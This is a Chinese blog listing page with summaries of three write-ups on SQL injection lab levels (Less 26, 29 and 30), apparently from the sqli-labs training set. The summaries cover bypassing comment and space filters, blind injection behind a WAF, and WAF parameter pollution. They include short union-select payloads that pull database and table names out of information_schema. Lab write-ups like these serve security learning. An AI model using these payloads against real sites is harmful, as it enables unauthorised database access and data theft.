2020年3月1日
Less(26)Trick with comments and space (过滤了注释和空格的注入)
摘要: 1.查看php文件,可以发现过滤了 or and /* -- # \s // (1)确认一下: ?id=%231 //确认过滤了# ?id=or1 //确认过滤了or ?id=/*1 //确认过滤了多行注释 ?id 1 //确认过滤了单行注释 ?id=/1 //确认过滤了斜杠 ?id=1' ' ' 阅读全文
posted @ 2020-03-01 20:56 孟雨 阅读(341) 评论(0) 推荐(0) 编辑
Less(30)Get-Blind Havaing with WAF
摘要: 1.和上一题差不都,只是单引号变成双引号 id="1" 2.爆破: (1)爆库:?id=-1" union select 1,database(),3 --+ (2)爆表:?id=-1" union select 1,group_concat(table_name),3 from informati 阅读全文
posted @ 2020-03-01 20:11 孟雨 阅读(126) 评论(0) 推荐(0) 编辑
Less(29)基于WAF的一个错误
摘要: waf是只允许输入数字的,我们在输入数字的时候先给waf看然后检测正常后才转发给我们需要访问的页面,那篇文章是有写到的,这里我弄2个值,一个是用来欺骗waf的。另一个才是给我们需要访问页面的 看一下这篇博客,http://blog.csdn.net/nzjdsds/article/details/7 阅读全文
posted @ 2020-03-01 19:16 孟雨 阅读(171) 评论(0) 推荐(0) 编辑